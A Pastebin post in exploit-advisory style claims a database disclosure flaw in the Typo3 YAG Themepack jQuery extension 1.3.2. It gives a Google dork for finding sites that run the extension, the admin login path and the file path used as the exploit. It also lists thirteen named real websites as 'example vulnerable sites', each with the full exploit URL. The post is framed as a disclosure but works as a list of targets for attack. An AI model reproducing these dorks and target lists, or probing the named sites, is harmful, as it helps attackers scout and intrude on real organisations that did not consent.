Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################################################
- # Exploit Title : Typo3 CMS YAG Themepack jQuery Extension 1.3.2 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 02/01/2019
- # Vendor Homepage : typo3.org ~ yag-gallery.de
- # Software Download Link : extensions.typo3.org/extension/download/yag_themepack_jquery/1.3.2/zip/
- + github.com/YAG-Gallery/yag_themepack_jquery/archive/master.zip
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 1.3.2
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/typo3conf/ext/yag_themepack_jquery/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- # CxSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010030
- # PacketStormSecurity Exploit Reference Link :
- packetstormsecurity.com/files/150986/Typo3-CMS-YAG-Themepack-jQuery-1.3.2-Database-Disclosure.html
- ################################################################################
- # Admin Panel Login Path :
- /typo3/index.php
- # Exploit :
- /typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- ################################################################################
- Information About Database =>
- ext_tables.sql (optional)
- ************************
- This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
- This file should contain a table structure dump of the tables used by the extension.
- It is used for evaluation of the database structure and is therefore important to check and update
- the database when an extension is enabled. If you add additional fields (or depend on certain fields)
- to existing tables, you can also put them here. In that case, insert a CREATE TABLE structure
- for that table, but remove all lines except the ones defining the fields you need. The ext_tables.sql
- file may not necessarily be dumpable directly to MySQL (because of the semi-complete
- table definitions allowed defining only required fields.). But the EM or
- Install Tool can handle this. The only very important thing is that the syntax of the content
- is exactly like MySQL made it so that the parsing and analysis routines of the EM don't get confused.
- ################################################################################
- # Example Vulnerable Sites =>
- [+] joyce-meyer.nl/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] schleef.info/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] jagdcom.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] players4players.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] gemeinde-gaiberg.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] tischfussball-em2008.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] zagro.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] joyce-meyer.nl/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] gmeinder-lokomotiven.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] plastipol.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] provincia.livorno.it/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] demo.szene-rostock.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- [+] cherninki.com/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
- ################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment